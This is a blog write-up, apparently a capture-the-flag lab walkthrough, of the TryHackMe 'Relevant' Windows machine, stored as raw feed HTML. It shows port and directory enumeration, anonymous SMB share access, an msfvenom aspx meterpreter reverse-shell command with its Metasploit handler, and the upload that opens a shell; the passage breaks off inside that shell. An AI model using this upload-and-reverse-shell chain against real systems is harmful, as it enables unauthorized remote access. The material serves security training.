https://crippledmind-infosec-journal.netlify.app/categories/windows/Recent content in Windows on CrippledMind's InfoSec JournalHugo -- gohugo.ioen-usSun, 16 Jun 2024 18:26:06 +0530https://crippledmind-infosec-journal.netlify.app/posts/writeups/thm/relevant/Sun, 16 Jun 2024 18:26:06 +0530https://crippledmind-infosec-journal.netlify.app/posts/writeups/thm/relevant/<h2 id="introduction">Introduction </h2><ul> <li><strong>Machine Name:</strong> Relevant</li> <li><strong>IP Address:</strong> [IP Address]</li> <li><strong>Difficulty:</strong> Medium</li> </ul> <h2 id="information-gathering">Information Gathering </h2><p>I started scan with <a class="link" href="https://github.com/RustScan/RustScan" target="_blank" rel="noopener" ><code>rustscan</code></a>, found port 80, 49663 and 445 ports open. These are the most common ports for getting initial foothold, but 49663 is very uncommon(so suspicious).</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">rustscan</span> <span class="c1">--ulimit 5000 -r 1-65535 -a $IP -- -Pn -A -T4 | tee -a scan.txt</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">PORT</span> <span class="n">STATE</span> <span class="n">SERVICE</span> <span class="n">REASON</span> <span class="n">VERSION</span> </span></span><span class="line"><span class="cl"><span class="mi">80</span><span class="o">/</span><span class="n">tcp</span> <span class="n">filtered</span> <span class="n">http</span> <span class="n">no</span><span class="o">-</span><span class="n">response</span> </span></span><span class="line"><span class="cl"><span class="mi">135</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">msrpc</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">Microsoft</span> <span class="n">Windows</span> <span class="n">RPC</span> </span></span><span class="line"><span class="cl"><span class="mi">139</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">Microsoft</span> <span class="n">Windows</span> <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span> </span></span><span class="line"><span class="cl"><span class="mi">445</span><span class="o">/</span><span class="n">tcp</span> <span class="n">filtered</span> <span class="n">microsoft</span><span class="o">-</span><span class="n">ds</span> <span class="n">no</span><span class="o">-</span><span class="n">response</span> </span></span><span class="line"><span class="cl"><span class="mi">3389</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">ms</span><span class="o">-</span><span class="n">wbt</span><span class="o">-</span><span class="n">server</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">Microsoft</span> <span class="n">Terminal</span> <span class="n">Services</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">rdp</span><span class="o">-</span><span class="n">ntlm</span><span class="o">-</span><span class="n">info</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Target_Name</span><span class="p">:</span> <span class="n">RELEVANT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">NetBIOS_Domain_Name</span><span class="p">:</span> <span class="n">RELEVANT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">NetBIOS_Computer_Name</span><span class="p">:</span> <span class="n">RELEVANT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">DNS_Domain_Name</span><span class="p">:</span> <span class="n">Relevant</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">DNS_Computer_Name</span><span class="p">:</span> <span class="n">Relevant</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Product_Version</span><span class="p">:</span> <span class="mf">10.0.14393</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span> <span class="n">System_Time</span><span class="p">:</span> <span class="mi">2024</span><span class="o">-</span><span class="mi">06</span><span class="o">-</span><span class="mi">16</span><span class="n">T13</span><span class="p">:</span><span class="mi">32</span><span class="p">:</span><span class="mi">28</span><span class="o">+</span><span class="mi">00</span><span class="p">:</span><span class="mi">00</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_ssl</span><span class="o">-</span><span class="n">date</span><span class="p">:</span> <span class="mi">2024</span><span class="o">-</span><span class="mi">06</span><span class="o">-</span><span class="mi">16</span><span class="n">T13</span><span class="p">:</span><span class="mi">33</span><span class="p">:</span><span class="mi">08</span><span class="o">+</span><span class="mi">00</span><span class="p">:</span><span class="mi">00</span><span class="p">;</span> <span class="mi">0</span><span class="n">s</span> <span class="n">from</span> <span class="n">scanner</span> <span class="n">time</span><span class="p">.</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ssl</span><span class="o">-</span><span class="n">cert</span><span class="p">:</span> <span class="n">Subject</span><span class="p">:</span> <span class="n">commonName</span><span class="o">=</span><span class="n">Relevant</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Issuer</span><span class="p">:</span> <span class="n">commonName</span><span class="o">=</span><span class="n">Relevant</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Public</span> <span class="n">Key</span> <span class="n">type</span><span class="p">:</span> <span class="n">rsa</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Public</span> <span class="n">Key</span> <span class="n">bits</span><span class="p">:</span> <span class="mi">2048</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Signature</span> <span class="n">Algorithm</span><span class="p">:</span> <span class="n">sha256WithRSAEncryption</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Not</span> <span class="n">valid</span> <span class="n">before</span><span class="p">:</span> <span class="mi">2024</span><span class="o">-</span><span class="mi">06</span><span class="o">-</span><span class="mi">15</span><span class="n">T13</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">30</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Not</span> <span class="n">valid</span> <span class="n">after</span><span class="p">:</span> <span class="mi">2024</span><span class="o">-</span><span class="mi">12</span><span class="o">-</span><span class="mi">15</span><span class="n">T13</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">30</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">MD5</span><span class="p">:</span> <span class="mi">3899</span><span class="p">:</span><span class="mi">9</span><span class="n">add</span><span class="p">:</span><span class="mi">605</span><span class="n">f</span><span class="p">:</span><span class="mi">3667</span><span class="p">:</span><span class="mi">4142</span><span class="p">:</span><span class="mi">6</span><span class="n">b8b</span><span class="p">:</span><span class="mf">7e42</span><span class="p">:</span><span class="mi">36</span><span class="n">ea</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">SHA</span><span class="o">-</span><span class="mi">1</span><span class="p">:</span> <span class="n">fc71</span><span class="p">:</span><span class="mi">3924</span><span class="p">:</span><span class="mi">4</span><span class="n">a7e</span><span class="p">:</span><span class="mi">0</span><span class="n">c01</span><span class="p">:</span><span class="n">bb51</span><span class="p">:</span><span class="mi">9465</span><span class="p">:</span><span class="mi">4800</span><span class="p">:</span><span class="mi">5</span><span class="n">f04</span><span class="p">:</span><span class="n">f2ac</span><span class="p">:</span><span class="n">d73b</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="c1">-----BEGIN CERTIFICATE-----</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">MIIC1DCCAbygAwIBAgIQfCiYuHMheZpPNXVuApyXhTANBgkqhkiG9w0BAQsFADAT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">MREwDwYDVQQDEwhSZWxldmFudDAeFw0yNDA2MTUxMzIyMzBaFw0yNDEyMTUxMzIy</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">MzBaMBMxETAPBgNVBAMTCFJlbGV2YW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">MIIBCgKCAQEAts8eZAiC029jcGXhUL68IXseXFWcgqXCiDU4X7Ba811bVw9ESy70</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">iVO76DBONGsr4Yd5</span><span class="o">/</span><span class="n">dhHXtxBv6PfcjBCqc6g</span><span class="o">+</span><span class="n">CtR0</span><span class="o">/</span><span class="n">hfDPp</span><span class="o">+</span><span class="n">ml5P</span><span class="o">+</span><span class="n">uw4AZUTyfrY</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">6</span><span class="n">hVQqLBXojAlHt</span><span class="o">/</span><span class="n">avwYgxLdUO0LeonbHOEKD7GYTKUeXmzHRVnJWSu</span><span class="o">+</span><span class="n">ig4</span><span class="o">/</span><span class="mi">1</span><span class="n">DjLX</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Qy5rb5s8b</span><span class="o">+</span><span class="n">bEB7IXhTamR</span><span class="o">+</span><span class="n">VE43nmbk3uwZPvYnVFpOMh0GgzUYz37uU5wK1aUofe</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">mZk0J4LJXAR3l0V5StbaHp5XNb2AB2YHp2Pw7CundO6JB9zfmbSLujjjU4VUNqYw</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">2</span><span class="n">ptgSJZkV35</span><span class="o">//</span><span class="n">bqgEeHCRpNNCqVu6YhTVwIDAQABoyQwIjATBgNVHSUEDDAKBggr</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBACFbjHjCdSkY</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">De8PKuIF84qpcBet8saz5BbapeobNdCtpNybCHLtnDy2tHbsxS</span><span class="o">+</span><span class="mi">0</span><span class="n">OnGmtEN3cAaf</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">za2WoiMUcoD56nrx7vE02CuZGcnfgXN2G2sxxmCOZdRAMg257UWITeJLQH9zWZ5H</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Iikuk</span><span class="o">/</span><span class="n">rZIklL8ieX9</span><span class="o">+</span><span class="n">Ad2UeX4O843UsrxEfjnC0ZtcO</span><span class="o">+</span><span class="mi">1</span><span class="n">wZRlmYvKHj4ew</span><span class="o">/</span><span class="mi">5</span><span class="n">s</span><span class="o">/</span><span class="n">f4</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">gOOTZXCvc6zrLxrxQiYbxbVHlUgLwyhKgD</span><span class="o">/</span><span class="n">vq8YIvX27</span><span class="o">+</span><span class="n">mHZseMHzKD9QRhAlbkj</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Pz57I37Z3vkXsuI</span><span class="o">/</span><span class="n">i2bJc4gttrjH3lQqoMWYTI9dj1</span><span class="o">+</span><span class="mi">0</span><span class="n">W08XzDgnhtIf5aTAiwsP</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">rtieJbN7gm8</span><span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span><span class="c1">-----END CERTIFICATE-----</span> </span></span><span class="line"><span class="cl"><span class="mi">49663</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">http</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">Microsoft</span> <span class="n">IIS</span> <span class="n">httpd</span> <span class="mf">10.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">title</span><span class="p">:</span> <span class="n">IIS</span> <span class="n">Windows</span> <span class="n">Server</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">methods</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Supported</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">OPTIONS</span> <span class="n">TRACE</span> <span class="n">GET</span> <span class="n">HEAD</span> <span class="n">POST</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span> <span class="n">Potentially</span> <span class="n">risky</span> <span class="n">methods</span><span class="p">:</span> <span class="n">TRACE</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="n">header</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">IIS</span><span class="o">/</span><span class="mf">10.0</span> </span></span><span class="line"><span class="cl"><span class="mi">49667</span><span class="o">/</span><span class="n">tcp</span> <span class="n">filtered</span> <span class="n">unknown</span> <span class="n">no</span><span class="o">-</span><span class="n">response</span> </span></span><span class="line"><span class="cl"><span class="mi">49669</span><span class="o">/</span><span class="n">tcp</span> <span class="n">filtered</span> <span class="n">unknown</span> <span class="n">no</span><span class="o">-</span><span class="n">response</span> </span></span><span class="line"><span class="cl"><span class="n">Service</span> <span class="n">Info</span><span class="p">:</span> <span class="n">OS</span><span class="p">:</span> <span class="n">Windows</span><span class="p">;</span> <span class="n">CPE</span><span class="p">:</span> <span class="n">cpe</span><span class="p">:</span><span class="o">/</span><span class="n">o</span><span class="p">:</span><span class="n">microsoft</span><span class="p">:</span><span class="n">windows</span> </span></span></code></pre></div><h3 id="port-80">Port 80 </h3><p>The root just hosts a Microsoft IIS default server, will dirbust with feroxbuster. I generally use two wordlists,</p> <ul> <li>raft-medium-directories-lowercase.txt</li> <li>directory-list-2.3-medium.txt</li> </ul> <p>Deadend!!!</p> <h3 id="port-49663">Port 49663 </h3><p>Interestingly, I found a endpoint <code>nt4wrksv</code> with the second list. This machine makes us learn the importance of patience in enumeration, because the directory folder in the second list was at the very last. So i had to go through whole big list to get this endpoint.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span> <span class="n">node</span> <span class="n">system</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">feroxbuster</span> <span class="o">-</span><span class="n">w</span> <span class="err">$</span><span class="n">SECLISTS</span><span class="o">/</span><span class="n">Discovery</span><span class="o">/</span><span class="n">Web</span><span class="o">-</span><span class="n">Content</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium.txt</span> <span class="o">-</span><span class="n">u</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49663</span><span class="o">/</span> <span class="o">-</span><span class="n">C</span> <span class="mi">400</span><span class="p">,</span><span class="mi">404</span><span class="p">,</span><span class="mi">503</span> <span class="o">-</span><span class="n">n</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">___</span> <span class="n">___</span> <span class="n">__</span> <span class="n">__</span> <span class="n">__</span> <span class="n">__</span> <span class="n">__</span> <span class="n">___</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">__</span> <span class="o">|</span><span class="n">__</span> <span class="o">|</span><span class="n">__</span><span class="p">)</span> <span class="o">|</span><span class="n">__</span><span class="p">)</span> <span class="o">|</span> <span class="o">/</span> <span class="err">`</span> <span class="o">/</span> <span class="err">\</span> <span class="err">\</span><span class="n">_</span><span class="o">/</span> <span class="o">|</span> <span class="o">|</span> <span class="err">\</span> <span class="o">|</span><span class="n">__</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="o">|</span><span class="n">___</span> <span class="o">|</span> <span class="err">\</span> <span class="o">|</span> <span class="err">\</span> <span class="o">|</span> <span class="err">\</span><span class="n">__</span><span class="p">,</span> <span class="err">\</span><span class="n">__</span><span class="o">/</span> <span class="o">/</span> <span class="err">\</span> <span class="o">|</span> <span class="o">|</span><span class="n">__</span><span class="o">/</span> <span class="o">|</span><span class="n">___</span> </span></span><span class="line"><span class="cl"><span class="n">by</span> <span class="n">Ben</span> <span class="s2">&#34;epi&#34;</span> <span class="n">Risher</span> <span class="err">🤓</span> <span class="n">ver</span><span class="p">:</span> <span class="mf">2.10.3</span> </span></span><span class="line"><span class="cl"><span class="err">───────────────────────────┬──────────────────────</span> </span></span><span class="line"><span class="cl"> <span class="err">🎯</span> <span class="n">Target</span> <span class="n">Url</span> <span class="err">│</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49663</span><span class="o">/</span> </span></span><span class="line"><span class="cl"> <span class="err">🚀</span> <span class="n">Threads</span> <span class="err">│</span> <span class="mi">50</span> </span></span><span class="line"><span class="cl"> <span class="err">📖</span> <span class="n">Wordlist</span> <span class="err">│</span> <span class="o">/</span><span class="n">Users</span><span class="o">/</span><span class="n">vikas</span><span class="o">/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">hacking</span><span class="o">/</span><span class="n">SecLists</span><span class="o">/</span><span class="n">Discovery</span><span class="o">/</span><span class="n">Web</span><span class="o">-</span><span class="n">Content</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium.txt</span> </span></span><span class="line"><span class="cl"> <span class="err">💢</span> <span class="n">Status</span> <span class="n">Code</span> <span class="n">Filters</span> <span class="err">│</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">404</span><span class="p">,</span> <span class="mi">503</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="err">💥</span> <span class="n">Timeout</span> <span class="p">(</span><span class="n">secs</span><span class="p">)</span> <span class="err">│</span> <span class="mi">7</span> </span></span><span class="line"><span class="cl"> <span class="err">🦡</span> <span class="n">User</span><span class="o">-</span><span class="n">Agent</span> <span class="err">│</span> <span class="n">feroxbuster</span><span class="o">/</span><span class="mf">2.10.3</span> </span></span><span class="line"><span class="cl"> <span class="err">🔎</span> <span class="n">Extract</span> <span class="n">Links</span> <span class="err">│</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"> <span class="err">🏁</span> <span class="n">HTTP</span> <span class="n">methods</span> <span class="err">│</span> <span class="p">[</span><span class="n">GET</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="err">🚫</span> <span class="n">Do</span> <span class="n">Not</span> <span class="n">Recurse</span> <span class="err">│</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"> <span class="err">🎉</span> <span class="n">New</span> <span class="n">Version</span> <span class="n">Available</span> <span class="err">│</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">github.com</span><span class="o">/</span><span class="n">epi052</span><span class="o">/</span><span class="n">feroxbuster</span><span class="o">/</span><span class="n">releases</span><span class="o">/</span><span class="n">latest</span> </span></span><span class="line"><span class="cl"><span class="err">───────────────────────────┴──────────────────────</span> </span></span><span class="line"><span class="cl"> <span class="err">🏁</span> <span class="n">Press</span> <span class="p">[</span><span class="n">ENTER</span><span class="p">]</span> <span class="n">to</span> <span class="n">use</span> <span class="n">the</span> <span class="n">Scan</span> <span class="n">Management</span> <span class="n">Menu</span><span class="err">™</span> </span></span><span class="line"><span class="cl"><span class="err">──────────────────────────────────────────────────</span> </span></span><span class="line"><span class="cl"><span class="mi">404</span> <span class="n">GET</span> <span class="mi">0</span><span class="n">l</span> <span class="mi">0</span><span class="n">w</span> <span class="mi">0</span><span class="n">c</span> <span class="n">Auto</span><span class="o">-</span><span class="n">filtering</span> <span class="n">found</span> <span class="mi">404</span><span class="o">-</span><span class="n">like</span> <span class="n">response</span> <span class="ow">and</span> <span class="n">created</span> <span class="n">new</span> <span class="n">filter</span><span class="p">;</span> <span class="n">toggle</span> <span class="n">off</span> <span class="n">with</span> <span class="c1">--dont-filter</span> </span></span><span class="line"><span class="cl"><span class="mi">200</span> <span class="n">GET</span> <span class="mi">334</span><span class="n">l</span> <span class="mi">2089</span><span class="n">w</span> <span class="mi">180418</span><span class="n">c</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49663</span><span class="o">/</span><span class="n">iisstart.png</span> </span></span><span class="line"><span class="cl"><span class="mi">200</span> <span class="n">GET</span> <span class="mi">32</span><span class="n">l</span> <span class="mi">55</span><span class="n">w</span> <span class="mi">703</span><span class="n">c</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49663</span><span class="o">/</span> </span></span><span class="line"><span class="cl"><span class="mi">301</span> <span class="n">GET</span> <span class="mi">2</span><span class="n">l</span> <span class="mi">10</span><span class="n">w</span> <span class="mi">157</span><span class="n">c</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49663</span><span class="o">/</span><span class="n">nt4wrksv</span> <span class="o">=&gt;</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49663</span><span class="o">/</span><span class="n">nt4wrksv</span><span class="o">/</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">cat</span> <span class="err">$</span><span class="n">SECLISTS</span><span class="o">/</span><span class="n">Discovery</span><span class="o">/</span><span class="n">Web</span><span class="o">-</span><span class="n">Content</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium.txt</span> <span class="o">|</span> <span class="n">grep</span> <span class="o">-</span><span class="kr">in</span> <span class="s2">&#34;nt4wrksv&#34;</span> </span></span><span class="line"><span class="cl"><span class="mi">220538</span><span class="p">:</span><span class="n">nt4wrksv</span> </span></span></code></pre></div><h3 id="port-445">Port 445 </h3><p>It has a share <code>nt4wrksv</code> available with anonymous access(Note: the same folder is available from port 49663) It has a passwords.txt file. This passwords.txt file is also accessible from port 49663. This is a serious vulnerability. I can now upload an aspx reverse shell(since windows) in smb share, then access it from port 49663 to execute it.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">smbclient</span> <span class="o">-</span><span class="n">L</span> <span class="err">\\\\</span><span class="mf">10.10.171.47</span><span class="err">\\</span> <span class="o">-</span><span class="n">U</span> <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">Password</span> <span class="kr">for</span> <span class="p">[</span><span class="n">WORKGROUP</span><span class="err">\</span><span class="p">]:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">Sharename</span> <span class="n">Type</span> <span class="n">Comment</span> </span></span><span class="line"><span class="cl"> <span class="c1">--------- ---- -------</span> </span></span><span class="line"><span class="cl"> <span class="n">ADMIN</span><span class="err">$</span> <span class="n">Disk</span> <span class="n">Remote</span> <span class="n">Admin</span> </span></span><span class="line"><span class="cl"> <span class="n">C</span><span class="err">$</span> <span class="n">Disk</span> <span class="n">Default</span> <span class="n">share</span> </span></span><span class="line"><span class="cl"> <span class="n">IPC</span><span class="err">$</span> <span class="n">IPC</span> <span class="n">Remote</span> <span class="n">IPC</span> </span></span><span class="line"><span class="cl"> <span class="n">nt4wrksv</span> <span class="n">Disk</span> </span></span><span class="line"><span class="cl"><span class="n">SMB1</span> <span class="n">disabled</span> <span class="c1">-- no workgroup available</span> </span></span></code></pre></div><p>I used msfvenom to generate an aspx shell so as to recieve a meterpreter shell. This is the alternate reverse shell to use if you want a nc session: <a class="link" href="https://gist.githubusercontent.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79/raw/6d4df39b991b6fe54c606eee45483b17cdd09c4c/aspx-reverse-shell.aspx" target="_blank" rel="noopener" ><code>qtc-de</code></a>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">msfvenom</span> <span class="o">-</span><span class="n">p</span> <span class="n">windows</span><span class="o">/</span><span class="n">x64</span><span class="o">/</span><span class="n">meterpreter_reverse_tcp</span> <span class="n">lhost</span><span class="o">=</span><span class="p">[</span><span class="n">IP</span><span class="p">]</span> <span class="n">lport</span><span class="o">=</span><span class="p">[</span><span class="n">PORT</span><span class="p">]</span> <span class="o">-</span><span class="n">f</span> <span class="n">aspx</span> <span class="o">-</span><span class="n">o</span> <span class="n">shell.aspx</span> </span></span></code></pre></div><p>Then started a handler in msfconsole,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span> </span></span><span class="line"><span class="cl"><span class="n">msf6</span> <span class="o">&gt;</span> <span class="n">use</span> <span class="n">exploit</span><span class="o">/</span><span class="n">multi</span><span class="o">/</span><span class="n">handler</span> </span></span><span class="line"><span class="cl"><span class="n">msf6</span> <span class="n">exploit</span><span class="p">(</span><span class="n">multi</span><span class="o">/</span><span class="n">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">set</span> <span class="n">payload</span> <span class="n">windows</span><span class="o">/</span><span class="n">x64</span><span class="o">/</span><span class="n">meterpreter_reverse_tcp</span> </span></span><span class="line"><span class="cl"><span class="n">msf6</span> <span class="n">exploit</span><span class="p">(</span><span class="n">multi</span><span class="o">/</span><span class="n">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">set</span> <span class="n">lhost</span> <span class="p">[</span><span class="n">IP</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">msf6</span> <span class="n">exploit</span><span class="p">(</span><span class="n">multi</span><span class="o">/</span><span class="n">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">set</span> <span class="n">lport</span> <span class="p">[</span><span class="n">PORT</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">msf6</span> <span class="n">exploit</span><span class="p">(</span><span class="n">multi</span><span class="o">/</span><span class="n">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">run</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Started</span> <span class="n">reverse</span> <span class="n">TCP</span> <span class="n">handler</span> <span class="n">on</span> <span class="p">[</span><span class="n">IP</span><span class="p">]:</span><span class="mi">4444</span> </span></span></code></pre></div><p>Uploading the shell file in the <code>nt4wrksv</code> smb share.(Do change your attack ip and port in the shell.aspx file.) I uploaded shell.aspx file with put command and queried the shell file from browser, got shell and also <code>user.txt</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span> </span></span><span class="line"><span class="cl"><span class="n">msf6</span> <span class="n">exploit</span><span class="p">(</span><span class="n">multi</span><span class="o">/</span><span class="n">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">run</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Started</span> <span class="n">reverse</span> <span class="n">TCP</span> <span class="n">handler</span> <span class="n">on</span> <span class="mf">10.14.82.36</span><span class="p">:</span><span class="mi">4444</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Meterpreter</span> <span class="n">session</span> <span class="mi">1</span> <span class="n">opened</span> <span class="p">(</span><span class="mf">10.14.82.36</span><span class="p">:</span><span class="mi">4444</span> <span class="o">-&gt;</span> <span class="mf">10.10.178.5</span><span class="p">:</span><span class="mi">49732</span><span class="p">)</span> <span class="n">at</span> <span class="mi">2024</span><span class="o">-</span><span class="mi">06</span><span class="o">-</span><span class="mi">17</span> <span class="mi">02</span><span class="p">:</span><span class="mi">36</span><span class="p">:</span><span class="mi">23</span> <span class="o">+</span><span class="mi">0530</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">meterpreter</span> <span class="o">&gt;</span> <span class="n">getuid</span> </span></span><span class="line"><span class="cl"><span class="n">Server</span> <span class="n">username</span><span class="p">:</span> <span class="n">IIS</span> <span class="n">APPPOOL</span><span class="err">\</span><span class="n">DefaultAppPool</span> </span></span><span class="line"><span class="cl"><span class="n">meterpreter</span> <span class="o">&gt;</span> <span class="n">shell</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">c</span><span class="p">:</span><span class="err">\</span><span class="n">windows</span><span class="err">\</span><span class="n">system32</span><span class="err">\</span><span class="n">inetsrv</span><span class="o">&gt;</span><span class="n">cd</span> <span class="n">c</span><span class="p">:</span><span class="err">\</span><span class="n">users</span><span class="err">\</span><span class="n">bob</span><span class="err">\</span><span class="n">desktop</span> </span></span><span class="line"><span class="cl"><span class="n">c</span><span class="p">:</span><span class="err">\</span><span class="n">Users</span><span class="err">\</span><span class="n">Bob</span><span class="err">\</span><span class="n">Desktop</span><span class="o">&gt;</span><span 